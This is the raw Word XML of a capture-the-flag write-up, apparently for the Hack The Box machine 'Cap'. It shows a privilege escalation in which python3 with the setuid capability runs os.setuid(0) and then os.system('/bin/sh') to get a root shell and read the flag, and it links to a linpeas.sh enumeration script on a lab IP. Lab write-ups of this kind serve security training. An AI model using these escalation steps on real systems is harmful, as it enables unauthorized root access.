        <w:t xml:space="preserve">. </w:t>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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="242424"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:fill="f9f9f9" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If we take a look at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">files with capabilities </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(I forgot to capture), we’ll find /usr/bin/python3.8 is able to set UID and bind services.</w:t>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Now, let’s try and set the UID to root. To do that, we run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, then we import</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> os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os.setuid(0)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to change the UID. To confirm, we can do </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">os.system(‘whoami’)</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os.system(‘id’)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2273300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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Then, we can launch a privileged shell using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">os.system(“/bin/sh”)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. By doing </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we can see that there’s user.txt there. Just do </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and we’ll obtain our root flag.</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5927959" cy="2028504"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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27959" cy="2028504"/>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sz w:val="22"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="en"/>
      </w:rPr>
    </w:rPrDefault>
    <w:pPrDefault>
      <w:pPr>
        <w:spacing w:line="276"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7.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.10.14.92/linpeas.sh" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/peass-ng/PEASS-ng" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.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5.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4.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://app.hackthebox.com/machines/Cap"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